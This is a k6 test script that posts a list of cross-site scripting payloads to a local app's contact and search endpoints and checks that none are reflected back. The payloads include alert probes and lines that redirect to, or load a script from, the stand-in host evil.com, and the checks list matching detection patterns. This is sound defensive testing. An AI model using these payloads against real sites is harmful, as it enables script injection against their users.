import http from 'k6/http';
import { check } from 'k6';

export const options = {
  thresholds: {
    checks: ['rate==1.0'],  // 所有安全检查必须通过
  },
};

const BASE_URL = __ENV.BASE_URL || 'http://localhost:3000';

const xssPayloads = [
  '<script>alert("XSS")</script>',
  '<img src=x onerror=alert("XSS")>',
  '<svg onload=alert("XSS")>',
  '<body onload=alert("XSS")>',
  '<input onfocus=alert("XSS") autofocus>',
  '<select onfocus=alert("XSS") autofocus>',
  '<textarea onfocus=alert("XSS") autofocus>',
  '<keygen onfocus=alert("XSS") autofocus>',
  '<video><source onerror=alert("XSS")>',
  '<audio src=x onerror=alert("XSS")>',
  '<iframe src="javascript:alert("XSS")">',
  '<details open ontoggle=alert("XSS")>',
  '<marquee onstart=alert("XSS")>',
  '<isindex action="javascript:alert("XSS")">',
  '<form><button formaction="javascript:alert("XSS")">X</button></form>',
  'javascript:alert("XSS")',
  '<script>document.location="http://evil.com"</script>',
  '<img src=x onerror="document.location=\'http://evil.com\'">',
  '<svg><script>document.location="http://evil.com"</script></svg>',
  '<script src="http://evil.com/xss.js"></script>',
  '<link rel="stylesheet" href="javascript:alert("XSS")">',
];

export default function () {
  let allPassed = true;

  xssPayloads.forEach((payload) => {
    const testCases = [
      {
        name: 'Contact Form - XSS',
        url: `${BASE_URL}/api/contact`,
        method: 'POST',
        body: JSON.stringify({
          name: payload,
          email: 'test@example.com',
          phone: '13800138000',
          message: payload,
        }),
      },
      {
        name: 'Search - XSS',
        url: `${BASE_URL}/api/search?q=${encodeURIComponent(payload)}`,
        method: 'GET',
      },
    ];

    testCases.forEach((testCase) => {
      let res;
      if (testCase.method === 'POST') {
        res = http.post(testCase.url, testCase.body, {
          headers: { 'Content-Type': 'application/json' },
          tags: { name: testCase.name },
        });
      } else {
        res = http.get(testCase.url, {
          tags: { name: testCase.name },
        });
      }

      const passed = check(res, {
        'status is 200 or 400 or 422': (r) => [200, 400, 422].includes(r.status),
        'XSS payload not reflected in response': (r) => {
          const lowerBody = r.body.toLowerCase();
          return !lowerBody.includes('<script>') &&
                 !lowerBody.includes('onerror=') &&
                 !lowerBody.includes('onload=') &&
                 !lowerBody.includes('onfocus=') &&
                 !lowerBody.includes('javascript:') &&
                 !lowerBody.includes('document.location');
        },
        'no alert in response': (r) => !r.body.includes('alert('),
        'no iframe in response': (r) => !r.body.includes('<iframe'),
        'no external script in response': (r) => !r.body.includes('http://evil.com'),
      });

      if (!passed) {
        allPassed = false;
        console.error(`XSS test failed for payload: ${payload}`);
      }
    });
  });

  if (!allPassed) {
    throw new Error('XSS tests failed');
  }
}